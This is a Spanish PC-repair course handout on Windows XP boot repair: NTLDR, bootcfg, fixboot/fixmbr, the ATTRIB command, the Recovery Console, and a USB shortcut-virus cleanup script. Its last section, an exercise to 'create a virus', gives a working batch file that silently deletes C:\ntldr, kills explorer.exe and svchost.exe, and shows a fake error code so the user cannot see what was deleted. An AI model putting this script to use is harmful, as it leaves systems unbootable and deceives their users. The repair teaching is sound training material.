Ing. Del Pino Miguel Angel (migueldelpino10@gmail.

com)

Curso de Reparador de PC Intermedio

Clase 4: NTLDR – Comando “ATTRIB” – Uso de la Consola de Recuperación
1) NTLDR: El archivo NTLDR es una parte esencial del proceso de arranque de Windows NT/2000/XP.
NTLDR es sinónimo de NT Loader, que es el gestor de arranque para estos tres sistemas operativos. Si el
archivo NTLDR falta o está dañado, el proceso de arranque no se puede completar. Esto hace que sea una parte
crucial del proceso de arranque, porque una de sus funciones consiste en cargar el sistema operativo y los
controladores. Es el Cargador del Sistema Operativo.
Función y Efecto del NTLDR: El NTLDR se hace cargo de llevar a cabo sus cuatro funciones principales en el
proceso de arranque:
1ero: Comenzar ntdetect.com para adquirir información relacionada con el hardware instalado en el PC.
2do: Examina el archivo boot.ini para localizar la ruta de la partición de arranque.
3ero: Carga dos archivos, ntoskrnl.exe y hal.dll (son la base sobre la que XP está construido).
4to: Por último, el NTLDR lee los archivos que se encuentran en el registro de Windows, selecciona un
perfil de hardware y comienza el proceso de cargar los controladores de los dispositivos del sistema.

a) Reparar el "Boot.ini": Cuando comienza a cargar de Windows XP, el programa Ntldr busca el archivo
Boot.ini para determinar cuál o cuáles son los S.O.´s disponibles. Si el problema reside en el archivo Boot.ini el
sistema no podrá arrancar. Para solucionar este problema usamos el comando Bootcfg, en la consola de
recuperación.
Bootcfg /add: Busca en el HD instalaciones de Windows y permite añadirlas al archivo Boot.ini
Bootcfg /scan: Busca en el disco duro instalaciones de Windows.
Bootcfg /list: Muestra cada entrada del archivo Boot.ini.
Bootcfg /Default: Establece el sistema operativo de arranque por defecto.
Bootcfg /Rebuild: Reconstruye el archivo Boot.ini

b) Sector de arranque y "MBR" defectuosos: El sector de arranque es una pequeña parte del disco duro que
contiene información acerca del sistema de archivos (NTFS o FAT32), y un pequeño fragmento de código que
ayuda al sistema a iniciar. El MBR o Master Boot Record ocupa el primer sector del disco duro y es
responsable de ceder el control a Windows para que éste inicie. Si se corrompen, el sistema operativo no podrá
arrancar. Para reparar estos sectores lo hacemos desde la consola de recuperación: Escribimos el siguiente
comando:
fixboot c : , y presionamos Enter. (Donde "c" es donde está instalado XP).
fixmbr c: , y presionamos Enter.

1
 Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)

2) COMANDO "ATTRIB": El comando ATTRIB muestra o cambia los atributos de los archivo y/o directorio
del sistema operativo Microsoft Windows.
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [unidad:][ruta][nombre-archivo] [/S [/D]]
Donde:
 +: Establece un atrib uto.
 -: Borra un atributo.
 R: Atributo de solo lectura del archivo.
 A: Atributo de archivo de almacenamiento.
 S: Atributo de archivos del sistema.
 H: Atributo de archivo oculto.
 [unidad:][ruta][nombre-archivo] Especifica el archivo o archivos que serán afectados por ATTRIB
 /S: Procesa archivos que coinciden en la carpeta actual y todas las carpetas.
 /D: Procesa carpetas.

Por ejemplo, algunos virus nos crean un archivo llamado autorun.inf en la raíz de nuestro disco o
pendrive y le otorgan permisos del sistema, por lo que no lo podemos borrar, entonces hacemos:

attrib –r –s –h autorun.inf

y luego lo borramos, otro caso es cuando el virus nos oculta varias carpetas, para esto podemos hacer:

attrib –r –s –h /s /d. Si te responde: Formato de parámetros incorrecto, entonces: attrib /d /s -r -h -s *.*

Trabajo Práctico: Provocar errores Intencionales en el S.O. XP (usando el comando ATTRIB):

Paso 1- Borramos el Archivo "NTLDR" del RAIZ del "C". Para eso entramos al DOS del Windows XP,
haciendo INICIO, EJECUTAR : Escribimos "cmd", y Aceptar::

Una vez en la consola nos ubicamos en el raiz "C", haciendo (la unidad del disco duro, generalmente es "c"):

C:\Documents and Settings\Administrador\cd..

C:\Documents and Settings\cd..
C:\

Paso 2 - Procedemos a retirar todos los atributos al archivo NTLDR (para luego poderlo borrar), así:

2
 Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)

c:\attrib -s –a –h –r ntldr (tener cuidado con los espacios)

Paso 3 - Ahora sí, procedemos al Borrado del

archivo ntldr. Para confirmar lo hecho
reiniciamos el equipo y nos debe aparecer un
error de que falta el archivo ntldr.
Paso 4- Reparar el Error.

Reparación del Error de Inicio en XP “Falta

NTLDR”:

Paso 1) Insertar el CD de XP SP3, y entrar en la

consola de recuperación (presionando “R”). Una
vez que tengamos en pantalla el editor con:

C:\Windows, teclear 1 y pulsar Intro.

Nos pedirá la Clave de administrador. Si no

hemos puesto clave, pulsamos Intro.

Paso 2) Tipear: fixboot y presionar la tecla

“S”. Presionar la tecla enter. Con esto
reparamos el BOOT.INI del sistema.

Paso 3) Sin cerrar la consola tipeamos

fixmbr, presionamos “s” para la
confirmación. Presionamos enter. Con esto
arreglamos el REGISTRO DE ARRANQUE
MAESTRO (MBR).

Paso 4) Tipear en la consola:

“copy d:\i386\ntldr c:”

(Donde “d” es la unidad CD/DVD - ALT+92

es la barra inclinada “\”).

3
 Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)

Paso 5) Tipear nuevamente: “copy d:\i386\ntdetect.com c:”

Paso 6) Escribir EXIT y enter. Listo!!!

Probar otras formas de solucionar el error: Con "LIVE BOOT 2012" y "HIREN`S BOOT 15.2"

3) INSTALACIÓN DE LA CONSOLA DE RECUPERACIÓN EN EL MENU DE INICIO:

Colocamos el CD de Windows XP en su unidad y

desde: Inicio, Ejecutar, escribimos:

X:\i386\winnt32.exe /cmdcons

(Donde X corresponde a la letra de la unidad

CD/DVD)

Aparecerá un mensaje: ¿Desea instalar la Consola de Recuperación? Pulsamos SI y la próxima vez

que arranquemos nuestro equipo, tendremos en el menú de arranque la opción de la Consola de Recuperación.
Una de las mayores ventajas de la Consola de Recuperación respecto por ejemplo al modo seguro, es
que esta, nos permite acceder incluso en el caso que existan archivos corruptos del sistema.

Ejercicio : Entrar en la Consola de Recuperación y ejecutar : "CHKDSK /R"

Sacar la opción en el arranque : Vamos a hacer click con el botón derecho en MI PC, PROPIEDADES y seleccionar la
solapa “OPCIONES AVANZADAS”, "Inicio y Recuperación", y en "Configuración", le damos "0" segundos a
"Mostrar Lista". Listo!!!

4) Eliminar Virus de Pendrive: “Carpetas ocultas y el AUTORUN.INF infectado”: Escribir en un archivo de

texto lo siguiente:
@echo off
title VIRUS DE ACCESOS DIRECTOS
color 1E
@echo ----------------------------------------------
@echo REPARACION DE A RCHIVOS USB
@echo ----------------------------------------------
@echo Mostrando Carpetas
Attrib /d /s -r -h -s *.*
@echo ----------------------------------------------
@echo Eliminado Accesos Directos
if exist *.lnk del *.lnk
@echo ----------------------------------------------
@echo Eliminado Autorun
if exist autorun.inf del autorun.inf
@echo ----------------------------------------------
@echo ----------------------------------------------
@echo Por Miguel
@echo ----------------------------------------------
@echo ----------------------------------------------

Guardar en archivo como “virus ocultos” y como extensión “.bat”. Listo, tenemos el archivo ejecutable.
4
 Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)

5) Trabajo Practico: "Crear un Virus con extensión -.BAT-"

Lo que vamos a hacer es básicamente eliminar el archivo NTLDR que es necesario para que Windows XP
arranque correctamente, y al no estar protegido con ningún sistema de permisos es realmente fácil eliminarlo al
aplicar este “virus” el equipo no iniciará mostrando un mensaje “Falta NTLDR”.

Veamos cómo hacerlo: El código es el siguiente y debemos meterlo en un archivo.bat, se puede hacer con
cualquier editor de texto simple como el bloc de notas:

@echo off
color 06
attrib -r -h -s %root:C:\ntldr
DEL /f /q "C:\ntldr"
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
cls
echo error #800889xC888
exit

Explicación:

Lo que hacemos en esta línea es cambiar los atributos de este archivo para que podamos eliminarlo con el
comando DEL

attrib -r -h -s %root:C:\ntldr

El comando DEL con los parámetros f y q lo que hace es eliminar el archivo ntldr forzando su eliminación y
evitando que pregunte si quieres eliminarlo

DEL /f /q "C:\ntldr"
Seguidamente para que el efecto sea instantáneo lo que hacemos es “matar” varios procesos críticos del sistema,
provocando con esto que el equipo se desestabilice y sea reiniciado sin poder hacer nada

taskkill /f /im explorer.exe

taskkill /f /im svchost.exe

Las siguientes líneas son para limpiar el contenido rápidamente y que el usuario no le dé tiempo de ver que
archivos han sido eliminados.